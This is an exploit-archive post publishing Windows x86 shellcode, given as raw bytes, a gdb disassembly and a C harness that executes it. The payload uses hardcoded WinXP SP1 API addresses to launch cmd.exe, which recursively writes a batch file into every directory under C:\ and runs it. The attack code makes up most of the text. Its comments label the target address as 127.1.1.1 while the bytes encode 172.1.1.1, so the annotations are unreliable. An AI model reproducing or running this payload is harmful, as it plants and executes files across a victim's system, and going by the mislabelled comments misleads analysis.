###########################

# Windows x86 Executable directory search Shellcode (130 bytes)

###########################

# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes
 
/*
Description: 
write & exec dir searcher
starts from C:\
If dir found then write, execute (ping 127.1.1.1) and exit
If Write/noexec dir found then continue
 
Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe
 
Null-free version:
 
(gdb) disassemble 
Dump of assembler code for function function:
=> 0x08048062 <+0>:    pop    ecx
   0x08048063 <+1>:   xor    eax,eax
   0x08048065 <+3>:   mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:   push   eax
   0x08048069 <+7>:   push   ecx
   0x0804806a <+8>:   mov    eax,0x77e6fd35
   0x0804806f <+13>:  call   eax
   0x08048071 <+15>:  xor    eax,eax
   0x08048073 <+17>:  push   eax
   0x08048074 <+18>:  mov    eax,0x77e798fd
   0x08048079 <+23>:  call   eax
 
 
NULL-free shellcode (132 bytes):
 
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
"\x50\x51\xb8"
"\x35\xfd\xe6\x77"                      // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                      // exit
"\xff\xd0\xe8\xe2\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
"\x2f\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                          // C:\
"\x20\x26\x46\x4f\x52"
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
"\x20\x44\x4f\x20"
"\x65\x63\x68\x6f\x20"
"\x70\x69\x6e\x67\x20"                  
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 127.1.1.1
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
"\x61\x74\x22\x26\x28\x63\x61\x6c"
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
"\x62\x61\x74\x22\x26\x26\x65\x78"
"\x69\x74\x29\x29\x22";
 
*/
// NULL version (130 bytes):
 
char code[] = 
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
"\x35\xfd\xe6\x77"                  // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                      // exit
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                          // C:\
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
"\x20\x2f\x72\x20\x25\x41\x20\x49"
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
"\x20\x65\x63\x68\x6f\x20\x70\x69"
"\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 127.1.1.1 
"\x3e\x22\x25\x41"
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
"\x26\x26\x65\x78\x69\x74\x29\x29"
"\x22\x00";
 
int main(int argc, char **argv)
 
{
        int (*func)();
        func = (int (*)()) code;
        (int)(*func)();
}


###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-02-28]

###########################